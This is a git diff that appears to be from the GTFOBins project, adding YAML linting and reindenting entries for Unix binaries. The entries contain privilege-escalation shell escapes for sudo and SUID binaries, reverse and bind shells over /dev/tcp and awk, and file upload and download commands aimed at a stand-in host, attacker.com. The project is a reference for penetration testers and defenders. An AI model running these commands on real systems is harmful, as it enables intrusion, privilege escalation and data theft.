diff --git a/.yamllint b/.yamllint new file mode 100644 index 0000000..d1e0270 --- /dev/null +++ b/.yamllint @@ -0,0 +1,3 @@ +extends: default +rules: + line-length: disable diff --git a/Makefile b/Makefile index a55dfdf..0193ca1 100644 --- a/Makefile +++ b/Makefile @@ -1,4 +1,4 @@ -.PHONY: serve serve-public bundle +.PHONY: serve serve-public bundle lint serve: bundle exec jekyll serve @@ -8,3 +8,6 @@ serve-public: bundle: bundle install + +lint: + yamllint . _gtfobins/*.md diff --git a/_config.yml b/_config.yml index ef0dac5..e5f5010 100644 --- a/_config.yml +++ b/_config.yml @@ -1,3 +1,4 @@ +--- title: GTFOBins exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md'] diff --git a/_data/functions.yml b/_data/functions.yml index cb15696..59a6f60 100644 --- a/_data/functions.yml +++ b/_data/functions.yml @@ -1,3 +1,4 @@ +--- execute-interactive: label: Interactive execute description: | diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md index 0656272..61216d6 100644 --- a/_gtfobins/ash.md +++ b/_gtfobins/ash.md @@ -1,13 +1,13 @@ --- functions: execute-interactive: - - code: ash + - code: ash file-write: - - code: | - export LFILE=file_to_write - ash -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + ash -c 'echo data > $LFILE' suid-enabled: - - code: "./ash" + - code: "./ash" sudo-enabled: - - code: sudo ash + - code: sudo ash --- diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md index 90da062..3bf4517 100644 --- a/_gtfobins/awk.md +++ b/_gtfobins/awk.md @@ -1,34 +1,34 @@ --- functions: execute-interactive: - - code: awk 'BEGIN {system("/bin/sh")}' + - code: awk 'BEGIN {system("/bin/sh")}' reverse-shell-non-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - RHOST=attacker.com - RPORT=12345 - awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { - s = "/inet/tcp/0/" RHOST "/" RPORT; - while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; - while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { + s = "/inet/tcp/0/" RHOST "/" RPORT; + while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; + while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' bind-shell-non-interactive: - - description: Run `nc target.com 12345` on the attacker box to connect to the shell. - code: | - LPORT=12345 - awk -v LPORT=$LPORT 'BEGIN { - s = "/inet/tcp/" LPORT "/0/0"; - while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; - while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. + code: | + LPORT=12345 + awk -v LPORT=$LPORT 'BEGIN { + s = "/inet/tcp/" LPORT "/0/0"; + while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; + while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' file-write: - - code: | - LFILE=file_to_write - awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }' + - code: | + LFILE=file_to_write + awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }' file-read: - - code: | - LFILE=file_to_read - awk '//' "$LFILE" + - code: | + LFILE=file_to_read + awk '//' "$LFILE" sudo-enabled: - - code: sudo awk 'BEGIN {system("/bin/sh")}' + - code: sudo awk 'BEGIN {system("/bin/sh")}' suid-limited: - - code: ./awk 'BEGIN {system("/bin/sh")}' + - code: ./awk 'BEGIN {system("/bin/sh")}' --- diff --git a/_gtfobins/base64.md b/_gtfobins/base64.md index 76f8551..0148a42 100644 --- a/_gtfobins/base64.md +++ b/_gtfobins/base64.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - base64 "$LFILE" | base64 --decode + - code: | + LFILE=file_to_read + base64 "$LFILE" | base64 --decode suid-enabled: - - code: | - LFILE=file_to_read - ./base64 "$LFILE" | base64 --decode + - code: | + LFILE=file_to_read + ./base64 "$LFILE" | base64 --decode sudo-enabled: - - code: | - LFILE=file_to_read - sudo base64 "$LFILE" | base64 --decode + - code: | + LFILE=file_to_read + sudo base64 "$LFILE" | base64 --decode --- diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index 5665958..55f6814 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md @@ -1,55 +1,52 @@ --- functions: execute-interactive: - - code: bash + - code: bash reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1' upload: - - description: Send local file in the body of an HTTP POST request. Run an HTTP - service on the attacker box to collect the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_send - bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT' - - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` - on the attacker box to collect the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_send - bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' + - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_send + bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT' + - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_send + bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' download: - - description: Fetch a remote file via HTTP GET request. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_get - bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ - 3<>/dev/tcp/$RHOST/$RPORT \ - | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' - - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` - on the attacker box to send the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_get - bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE' + - description: Fetch a remote file via HTTP GET request. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_get + bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ + 3<>/dev/tcp/$RHOST/$RPORT \ + | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' + - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_get + bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE' file-write: - - code: | - export LFILE=file_to_write - bash -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + bash -c 'echo data > $LFILE' file-read: - - description: It trims trailing newlines and it's not binary-safe. - code: | - export LFILE=file_to_read - bash -c 'echo "$(<$LFILE)"' + - description: It trims trailing newlines and it's not binary-safe. + code: | + export LFILE=file_to_read + bash -c 'echo "$(<$LFILE)"' suid-enabled: - - code: "./bash -p" + - code: "./bash -p" sudo-enabled: - - code: sudo bash + - code: sudo bash --- diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md index 7e387bb..7d22c7f 100644 --- a/_gtfobins/busybox.md +++ b/_gtfobins/busybox.md @@ -1,27 +1,25 @@ --- -description: | - BusyBox may contain many UNIX utilities, run `busybox --list-full` to check +description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example. functions: execute-interactive: - - code: busybox sh + - code: busybox sh upload: - - description: Serve files in the local folder running an HTTP server. - code: | - export LPORT=12345 - busybox httpd -f -p $LPORT -h . + - description: Serve files in the local folder running an HTTP server. + code: | + export LPORT=12345 + busybox httpd -f -p $LPORT -h . file-write: - - code: | - LFILE=file_to_write - busybox sh -c 'echo "data" > $LFILE' + - code: | + LFILE=file_to_write + busybox sh -c 'echo "data" > $LFILE' file-read: - - code: | - LFILE=file_to_read - ./busybox cat "$LFILE" + - code: | + LFILE=file_to_read + ./busybox cat "$LFILE" suid-enabled: - - description: It may drop the SUID privileges depending on the compilation flags - and the runtime configuration. - code: "./busybox sh" + - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration. + code: "./busybox sh" sudo-enabled: - - code: sudo busybox sh + - code: sudo busybox sh --- diff --git a/_gtfobins/cat.md b/_gtfobins/cat.md index 0278a57..3781ffa 100644 --- a/_gtfobins/cat.md +++ b/_gtfobins/cat.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - cat "$LFILE" + - code: | + LFILE=file_to_read + cat "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./cat "$LFILE" + - code: | + LFILE=file_to_read + ./cat "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo cat "$LFILE" + - code: | + LFILE=file_to_read + sudo cat "$LFILE" --- diff --git a/_gtfobins/crontab.md b/_gtfobins/crontab.md index 12ac6ae..6ec198c 100644 --- a/_gtfobins/crontab.md +++ b/_gtfobins/crontab.md @@ -1,9 +1,9 @@ --- functions: execute-non-interactive: - - description: The commands are executed according to the crontab file edited via the `crontab` utility. - code: crontab -e + - description: The commands are executed according to the crontab file edited via the `crontab` utility. + code: crontab -e sudo-enabled: - - description: The commands are executed according to the crontab file edited via the `crontab` utility. - code: sudo crontab -e + - description: The commands are executed according to the crontab file edited via the `crontab` utility. + code: sudo crontab -e --- diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md index e37cb53..07716b7 100644 --- a/_gtfobins/csh.md +++ b/_gtfobins/csh.md @@ -1,13 +1,13 @@ --- functions: execute-interactive: - - code: csh + - code: csh file-write: - - code: | - export LFILE=file_to_write - ash -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + ash -c 'echo data > $LFILE' suid-enabled: - - code: "./csh -b" + - code: "./csh -b" sudo-enabled: - - code: sudo csh + - code: sudo csh --- diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md index 3ad8be7..c14cc1b 100644 --- a/_gtfobins/curl.md +++ b/_gtfobins/curl.md @@ -1,21 +1,20 @@ --- functions: upload: - - description: Send local file with an HTTP POST request. Run an HTTP service on - the attacker box to collect the file. - code: | - URL=http://attacker.com/ - LFILE=file_to_send - curl -X POST -d @$file_to_send $URL + - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + URL=http://attacker.com/ + LFILE=file_to_send + curl -X POST -d @$file_to_send $URL download: - - description: Fetch a remote file via HTTP GET request. - code: | - URL=http://attacker.com/file_to_get - LFILE=file_to_save - curl $URL -o $LFILE + - description: Fetch a remote file via HTTP GET request. + code: | + URL=http://attacker.com/file_to_get + LFILE=file_to_save + curl $URL -o $LFILE file-read: - - description: The file path must be absolute. - code: | - LFILE=/tmp/file_to_read - curl file://$LFILE + - description: The file path must be absolute. + code: | + LFILE=/tmp/file_to_read + curl file://$LFILE --- diff --git a/_gtfobins/cut.md b/_gtfobins/cut.md index 8c255b9..c9afd76 100644 --- a/_gtfobins/cut.md +++ b/_gtfobins/cut.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - cut -d "" -f1 "$LFILE" + - code: | + LFILE=file_to_read + cut -d "" -f1 "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./cut -d "" -f1 "$LFILE" + - code: | + LFILE=file_to_read + ./cut -d "" -f1 "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo cut -d "" -f1 "$LFILE" + - code: | + LFILE=file_to_read + sudo cut -d "" -f1 "$LFILE" --- diff --git a/_gtfobins/dash.md b/_gtfobins/dash.md index 724a3dc..b1dc72f 100644 --- a/_gtfobins/dash.md +++ b/_gtfobins/dash.md @@ -1,13 +1,13 @@ --- functions: execute-interactive: - - code: dash + - code: dash file-write: - - code: | - export LFILE=file_to_write - ash -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + ash -c 'echo data > $LFILE' suid-enabled: - - code: "./dash -p" + - code: ./dash -p sudo-enabled: - - code: sudo dash + - code: sudo dash --- diff --git a/_gtfobins/dd.md b/_gtfobins/dd.md index 4c8eb8d..192bfc2 100644 --- a/_gtfobins/dd.md +++ b/_gtfobins/dd.md @@ -1,11 +1,11 @@ --- functions: file-write: - - code: | - LFILE=file_to_write - echo "data" | dd of=$LFILE + - code: | + LFILE=file_to_write + echo "data" | dd of=$LFILE file-read: - - code: | - LFILE=file_to_read - dd if=LFILE + - code: | + LFILE=file_to_read + dd if=LFILE --- diff --git a/_gtfobins/diff.md b/_gtfobins/diff.md index 0fc0308..6e24b86 100644 --- a/_gtfobins/diff.md +++ b/_gtfobins/diff.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - diff --line-format=%L /dev/null $LFILE + - code: | + LFILE=file_to_read + diff --line-format=%L /dev/null $LFILE suid-enabled: - - code: | - LFILE=file_to_read - ./diff --line-format=%L /dev/null $LFILE + - code: | + LFILE=file_to_read + ./diff --line-format=%L /dev/null $LFILE sudo-enabled: - - code: | - LFILE=file_to_read - sudo diff --line-format=%L /dev/null $LFILE + - code: | + LFILE=file_to_read + sudo diff --line-format=%L /dev/null $LFILE --- diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md index 9683b83..2e84659 100644 --- a/_gtfobins/ed.md +++ b/_gtfobins/ed.md @@ -1,23 +1,21 @@ --- functions: execute-interactive: - - code: | - ed - !/bin/sh + - code: | + ed + !/bin/sh file-write: - - code: | - ed file_to_write - w + - code: | + ed file_to_write + w file-read: - - code: 'ed file_to_read - -' + - code: ed file_to_read sudo-enabled: - - code: | - sudo ed - !/bin/sh + - code: | + sudo ed + !/bin/sh suid-limited: - - code: | - ./ed - !/bin/sh + - code: | + ./ed + !/bin/sh --- diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md index d758d40..36fbe6b 100644 --- a/_gtfobins/emacs.md +++ b/_gtfobins/emacs.md @@ -1,17 +1,15 @@ --- functions: execute-interactive: - - code: emacs -Q -nw --eval '(term "/bin/sh")' + - code: emacs -Q -nw --eval '(term "/bin/sh")' file-write: - - code: | - emacs file_to_write - C-x C-s + - code: | + emacs file_to_write + C-x C-s file-read: - - code: 'emacs file_to_read - -' + - code: emacs file_to_read suid-enabled: - - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' + - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' sudo-enabled: - - code: sudo emacs -Q -nw --eval '(term "/bin/sh")' + - code: sudo emacs -Q -nw --eval '(term "/bin/sh")' --- diff --git a/_gtfobins/env.md b/_gtfobins/env.md index 71b1e78..0dc5e64 100644 --- a/_gtfobins/env.md +++ b/_gtfobins/env.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: env /bin/sh + - code: env /bin/sh suid-enabled: - - code: "./env /bin/sh -p" + - code: ./env /bin/sh -p sudo-enabled: - - code: sudo env /bin/sh + - code: sudo env /bin/sh --- diff --git a/_gtfobins/expand.md b/_gtfobins/expand.md index 8ff7fbd..3c00ddf 100644 --- a/_gtfobins/expand.md +++ b/_gtfobins/expand.md @@ -1,18 +1,16 @@ --- -description: 'The read file content is corrupted by replacing tabs with spaces. - -' +description: The read file content is corrupted by replacing tabs with spaces. functions: file-read: - - code: | - LFILE=file_to_read - expand "$LFILE" + - code: | + LFILE=file_to_read + expand "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./expand "$LFILE" + - code: | + LFILE=file_to_read + ./expand "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo expand "$LFILE" + - code: | + LFILE=file_to_read + sudo expand "$LFILE" --- diff --git a/_gtfobins/expect.md b/_gtfobins/expect.md index 3e9602b..541aa47 100644 --- a/_gtfobins/expect.md +++ b/_gtfobins/expect.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: expect -c 'spawn /bin/sh;interact' + - code: expect -c 'spawn /bin/sh;interact' suid-enabled: - - code: "./expect -c 'spawn /bin/sh -p;interact'" + - code: ./expect -c 'spawn /bin/sh -p;interact' sudo-enabled: - - code: sudo expect -c 'spawn /bin/sh;interact' + - code: sudo expect -c 'spawn /bin/sh;interact' --- diff --git a/_gtfobins/find.md b/_gtfobins/find.md index fc1386a..bb85e04 100644 --- a/_gtfobins/find.md +++ b/_gtfobins/find.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: find . -exec /bin/sh \; -quit + - code: find . -exec /bin/sh \; -quit suid-enabled: - - code: "./find . -exec /bin/sh -p \\; -quit" + - code: ./find . -exec /bin/sh -p \; -quit sudo-enabled: - - code: sudo find . -exec /bin/sh \; -quit + - code: sudo find . -exec /bin/sh \; -quit --- diff --git a/_gtfobins/flock.md b/_gtfobins/flock.md index 28a0ec3..22c0937 100644 --- a/_gtfobins/flock.md +++ b/_gtfobins/flock.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: flock -u / /bin/sh + - code: flock -u / /bin/sh suid-enabled: - - code: "./flock -u / /bin/sh -p" + - code: ./flock -u / /bin/sh -p sudo-enabled: - - code: sudo flock -u / /bin/sh + - code: sudo flock -u / /bin/sh --- diff --git a/_gtfobins/fmt.md b/_gtfobins/fmt.md index 79b69ac..88f783d 100644 --- a/_gtfobins/fmt.md +++ b/_gtfobins/fmt.md @@ -1,18 +1,16 @@ --- -description: 'The read file content is not binary-safe. - -' +description: The read file content is not binary-safe. functions: file-read: - - code: | - LFILE=file_to_read - fmt -pNON_EXISTING_PREFIX "$LFILE" + - code: | + LFILE=file_to_read + fmt -pNON_EXISTING_PREFIX "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./fmt -pNON_EXISTING_PREFIX "$LFILE" + - code: | + LFILE=file_to_read + ./fmt -pNON_EXISTING_PREFIX "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo fmt -pNON_EXISTING_PREFIX "$LFILE" + - code: | + LFILE=file_to_read + sudo fmt -pNON_EXISTING_PREFIX "$LFILE" --- diff --git a/_gtfobins/fold.md b/_gtfobins/fold.md index cf98e21..e05e3e4 100644 --- a/_gtfobins/fold.md +++ b/_gtfobins/fold.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - fold -w99999999 "$LFILE" + - code: | + LFILE=file_to_read + fold -w99999999 "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./fold -w99999999 "$LFILE" + - code: | + LFILE=file_to_read + ./fold -w99999999 "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo fold -w99999999 "$LFILE" + - code: | + LFILE=file_to_read + sudo fold -w99999999 "$LFILE" --- diff --git a/_gtfobins/ftp.md b/_gtfobins/ftp.md index c80f99a..3a522dc 100644 --- a/_gtfobins/ftp.md +++ b/_gtfobins/ftp.md @@ -1,23 +1,23 @@ --- functions: execute-interactive: - - code: | - ftp - !/bin/sh + - code: | + ftp + !/bin/sh upload: - - description: Send local file to a FTP server. - code: | - RHOST=attacker.com - ftp $RHOST - put file_to_send + - description: Send local file to a FTP server. + code: | + RHOST=attacker.com + ftp $RHOST + put file_to_send download: - - description: Fetch a remote file from a FTP server. - code: | - RHOST=attacker.com - ftp $RHOST - get file_to_get + - description: Fetch a remote file from a FTP server. + code: | + RHOST=attacker.com + ftp $RHOST + get file_to_get sudo-enabled: - - code: | - sudo ftp - !/bin/sh + - code: | + sudo ftp + !/bin/sh --- diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md index 413739b..3718449 100644 --- a/_gtfobins/gdb.md +++ b/_gtfobins/gdb.md @@ -7,11 +7,11 @@ description: | [version 3](/gtfobins/python3/). functions: execute-interactive: - - code: gdb -nx -ex '!sh' -ex quit + - code: gdb -nx -ex '!sh' -ex quit file-write: - - code: | - LFILE=file_to_write - gdb -nx -ex "dump value $LFILE \"data\"" -ex quit + - code: | + LFILE=file_to_write + gdb -nx -ex "dump value $LFILE \"data\"" -ex quit sudo-enabled: - - code: sudo gdb -nx -ex '!sh' -ex quit + - code: sudo gdb -nx -ex '!sh' -ex quit --- diff --git a/_gtfobins/head.md b/_gtfobins/head.md index 00a98a5..68f282f 100644 --- a/_gtfobins/head.md +++ b/_gtfobins/head.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - head -c1G "$LFILE" + - code: | + LFILE=file_to_read + head -c1G "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./head -c1G "$LFILE" + - code: | + LFILE=file_to_read + ./head -c1G "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo head -c1G "$LFILE" + - code: | + LFILE=file_to_read + sudo head -c1G "$LFILE" --- diff --git a/_gtfobins/ionice.md b/_gtfobins/ionice.md index 4582300..9597bea 100644 --- a/_gtfobins/ionice.md +++ b/_gtfobins/ionice.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: ionice /bin/sh + - code: ionice /bin/sh suid-enabled: - - code: "./ionice /bin/sh -p" + - code: ./ionice /bin/sh -p sudo-enabled: - - code: sudo ionice /bin/sh + - code: sudo ionice /bin/sh --- diff --git a/_gtfobins/jq.md b/_gtfobins/jq.md index c894c84..87989ad 100644 --- a/_gtfobins/jq.md +++ b/_gtfobins/jq.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - jq -Rr . "$LFILE" + - code: | + LFILE=file_to_read + jq -Rr . "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./jq -Rr . "$LFILE" + - code: | + LFILE=file_to_read + ./jq -Rr . "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo jq -Rr . "$LFILE" + - code: | + LFILE=file_to_read + sudo jq -Rr . "$LFILE" --- diff --git a/_gtfobins/ksh.md b/_gtfobins/ksh.md index 1ebc62f..434607a 100644 --- a/_gtfobins/ksh.md +++ b/_gtfobins/ksh.md @@ -1,59 +1,56 @@ --- functions: execute-interactive: - - code: ksh + - code: ksh reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1' upload: - - description: Send local file in the body of an HTTP POST request. Run an HTTP - service on the attacker box to collect the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_send - ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' - - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` - on the attacker box to collect the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_send - ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' + - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_send + ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' + - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_send + ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' download: - - description: Fetch a remote file via HTTP GET request. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_get - ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ - 3<>/dev/tcp/$RHOST/$RPORT \ - | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' - - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` - on the attacker box to send the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_get - ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE' + - description: Fetch a remote file via HTTP GET request. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_get + ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ + 3<>/dev/tcp/$RHOST/$RPORT \ + | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' + - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_get + ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE' file-write: - - code: | - export LFILE=file_to_write - ksh -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + ksh -c 'echo data > $LFILE' file-read: - - description: It trims trailing newlines. - code: | - export LFILE=file_to_read - ksh -c 'echo "$(<$LFILE)"' - - description: It trims trailing newlines. - code: | - export LFILE=file_to_read - ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"' + - description: It trims trailing newlines. + code: | + export LFILE=file_to_read + ksh -c 'echo "$(<$LFILE)"' + - description: It trims trailing newlines. + code: | + export LFILE=file_to_read + ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"' suid-enabled: - - code: "./ksh -p" + - code: ./ksh -p sudo-enabled: - - code: sudo ksh + - code: sudo ksh --- diff --git a/_gtfobins/ld.so.md b/_gtfobins/ld.so.md index 081ec5a..2a5cfcb 100644 --- a/_gtfobins/ld.so.md +++ b/_gtfobins/ld.so.md @@ -9,9 +9,9 @@ description: | ``` functions: execute-interactive: - - code: "/lib/ld.so /bin/sh" + - code: /lib/ld.so /bin/sh suid-enabled: - - code: "./ld.so /bin/sh -p" + - code: ./ld.so /bin/sh -p sudo-enabled: - - code: sudo /lib/ld.so /bin/sh + - code: sudo /lib/ld.so /bin/sh --- diff --git a/_gtfobins/less.md b/_gtfobins/less.md index d6d9044..d895060 100644 --- a/_gtfobins/less.md +++ b/_gtfobins/less.md @@ -1,22 +1,20 @@ --- functions: execute-interactive: - - code: | - less /etc/profile - !/bin/sh - - code: | - VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile - v + - code: | + less /etc/profile + !/bin/sh + - code: | + VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile + v file-read: - - code: 'less file_to_read - -' + - code: less file_to_read sudo-enabled: - - code: | - sudo less /etc/profile - !/bin/sh + - code: | + sudo less /etc/profile + !/bin/sh suid-limited: - - code: | - ./less /etc/profile - !/bin/sh + - code: | + ./less /etc/profile + !/bin/sh --- diff --git a/_gtfobins/ltrace.md b/_gtfobins/ltrace.md index b962133..f7b420b 100644 --- a/_gtfobins/ltrace.md +++ b/_gtfobins/ltrace.md @@ -1,7 +1,7 @@ --- functions: execute-interactive: - - code: ltrace -b -L /bin/sh + - code: ltrace -b -L /bin/sh sudo-enabled: - - code: sudo ltrace -b -L /bin/sh + - code: sudo ltrace -b -L /bin/sh --- diff --git a/_gtfobins/mail.md b/_gtfobins/mail.md index ec40e5a..c6f46d1 100644 --- a/_gtfobins/mail.md +++ b/_gtfobins/mail.md @@ -1,17 +1,17 @@ --- functions: execute-interactive: - - description: This creates a valid Mbox file which may be required by the binary. - code: | - TF=$(mktemp) - echo "From nobody@localhost $(date)" > $TF - mail -f $TF - !/bin/sh + - description: This creates a valid Mbox file which may be required by the binary. + code: | + TF=$(mktemp) + echo "From nobody@localhost $(date)" > $TF + mail -f $TF + !/bin/sh sudo-enabled: - - description: This creates a valid Mbox file which may be required by the binary. - code: | - TF=$(mktemp) - echo "From nobody@localhost $(date)" > $TF - sudo mail -f $TF - !/bin/sh + - description: This creates a valid Mbox file which may be required by the binary. + code: | + TF=$(mktemp) + echo "From nobody@localhost $(date)" > $TF + sudo mail -f $TF + !/bin/sh --- diff --git a/_gtfobins/make.md b/_gtfobins/make.md index 4153bdf..3a0f825 100644 --- a/_gtfobins/make.md +++ b/_gtfobins/make.md @@ -1,24 +1,21 @@ --- -description: | - All these examples only work with GNU `make` due to the lack of support of the - `--eval` flag. The same can be achieved by using a proper `Makefile` or by - passing the content via stdin using `-f -`. +description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`. functions: execute-interactive: - - code: | - COMMAND='/bin/sh' - make -s --eval=$'x:\n\t-'"$COMMAND" + - code: | + COMMAND='/bin/sh' + make -s --eval=$'x:\n\t-'"$COMMAND" file-write: - - description: Requires a newer GNU `make` version. - code: | - LFILE=file_to_write - make -s --eval="\$(file >$LFILE,data)" . + - description: Requires a newer GNU `make` version. + code: | + LFILE=file_to_write + make -s --eval="\$(file >$LFILE,data)" . suid-enabled: - - code: | - COMMAND='/bin/sh -p' - ./make -s --eval=$'x:\n\t-'"$COMMAND" + - code: | + COMMAND='/bin/sh -p' + ./make -s --eval=$'x:\n\t-'"$COMMAND" sudo-enabled: - - code: | - COMMAND='/bin/sh' - sudo make -s 